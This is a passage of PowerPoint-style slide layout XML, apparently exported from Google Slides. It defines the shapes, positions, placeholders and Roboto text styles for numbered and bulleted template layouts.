          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178975" y="257336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8" name="Google Shape;408;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="409" name="Google Shape;409;p24"/>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410" name="Google Shape;410;p24"/>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1" name="Google Shape;411;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="25735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12" name="Google Shape;412;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179038" y="125888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3" name="Google Shape;413;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="414" name="Google Shape;414;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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415" name="Google Shape;415;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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6" name="Google Shape;416;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1259000"/>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17" name="Google Shape;417;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178925" y="169698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8" name="Google Shape;418;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="419" name="Google Shape;419;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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420" name="Google Shape;420;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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1" name="Google Shape;421;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1697125"/>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24. Numbered 1–3 (Green)">
  <p:cSld name="CUSTOM_2_7_1_5">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 422"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Google Shape;423;p2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24" name="Google Shape;424;p2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25" name="Google Shape;425;p2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26" name="Google Shape;426;p2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427" name="Google Shape;427;p2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28" name="Google Shape;428;p2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29" name="Google Shape;429;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="430" name="Google Shape;430;p25"/>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31" name="Google Shape;431;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>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2" name="Google Shape;432;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275"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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275"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34" name="Google Shape;434;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="435" name="Google Shape;435;p25"/>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436" name="Google Shape;436;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>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7" name="Google Shape;437;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050"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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050"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39" name="Google Shape;439;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="1345853"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="440" name="Google Shape;440;p25"/>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441" name="Google Shape;441;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>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2" name="Google Shape;442;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="193852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25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="193858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25. Numbered 1–2 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_5_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 444"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="445" name="Google Shape;445;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286263" y="1183050"/>
            <a:ext cx="827470" cy="3662574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Google Shape;446;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076325" y="142355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48" name="Google Shape;448;p2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49" name="Google Shape;449;p2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50" name="Google Shape;450;p2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451" name="Google Shape;451;p2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52" name="Google Shape;452;p2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53" name="Google Shape;453;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457206" y="1421303"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="454" name="Google Shape;454;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621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55" name="Google Shape;455;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="34032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6" name="Google Shape;456;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2135850"/>
            <a:ext cx="4298400" cy="25446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7" name="Google Shape;457;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076325" y="1423475"/>
            <a:ext cx="3057600" cy="476100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="0" rIns="457200" bIns="0" anchor="ctr"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8" name="Google Shape;458;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5555425" y="142580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9" name="Google Shape;459;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4936306" y="1423553"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="460" name="Google Shape;460;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621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461" name="Google Shape;461;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="34032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2" name="Google Shape;462;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="2138100"/>
            <a:ext cx="4298400" cy="25446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63" name="Google Shape;463;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5555425" y="1425725"/>
            <a:ext cx="3057600" cy="476100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="0" rIns="457200" bIns="0" anchor="ctr"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26. Numbered 1–5 (Grey)">
  <p:cSld name="CUSTOM_2_7_1_5_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 464"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Google Shape;465;p2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66" name="Google Shape;466;p2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67" name="Google Shape;467;p2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68" name="Google Shape;468;p2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469" name="Google Shape;469;p2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70" name="Google Shape;470;p2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71" name="Google Shape;471;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="125272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01</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Google Shape;472;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190550" y="127657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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133475" y="127657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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457188" y="196237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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="876063" y="196237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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7934400" y="193852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02</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Google Shape;477;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="262237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03</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="Google Shape;478;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="264622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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="264622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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="514338" y="340822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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="933213" y="340822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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7991550" y="338437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04</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Google Shape;483;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="4095388"/>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05</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Google Shape;484;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="4119238"/>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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="4119238"/>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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="1267550"/>
            <a:ext cx="7434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87" name="Google Shape;487;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1944963"/>
            <a:ext cx="9144000" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="1554475" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;488;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="2648175"/>
            <a:ext cx="9168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89" name="Google Shape;489;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="3394650"/>
            <a:ext cx="9144000" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="1554475" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r"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90" name="Google Shape;490;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="4119225"/>
            <a:ext cx="9168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guide id="2" pos="5460">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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27. Bullets 1–4 (Greens)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 491"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Google Shape;492;p28"/>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94" name="Google Shape;494;p2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95" name="Google Shape;495;p2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96" name="Google Shape;496;p2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497" name="Google Shape;497;p2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98" name="Google Shape;498;p2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99" name="Google Shape;499;p28"/>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00" name="Google Shape;500;p28"/>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8"/>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8"/>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8"/>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04" name="Google Shape;504;p28"/>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05" name="Google Shape;505;p28"/>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06" name="Google Shape;506;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="507" name="Google Shape;507;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="508" name="Google Shape;508;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="509" name="Google Shape;509;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3082261"/>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28. Bullets 1–4 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 510"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Google Shape;511;p29"/>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3" name="Google Shape;513;p2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14" name="Google Shape;514;p2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15" name="Google Shape;515;p2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16" name="Google Shape;516;p2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17" name="Google Shape;517;p2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8" name="Google Shape;518;p29"/>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9" name="Google Shape;519;p29"/>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9"/>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9"/>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9"/>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23" name="Google Shape;523;p29"/>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24" name="Google Shape;524;p29"/>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25" name="Google Shape;525;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="526" name="Google Shape;526;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="527" name="Google Shape;527;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
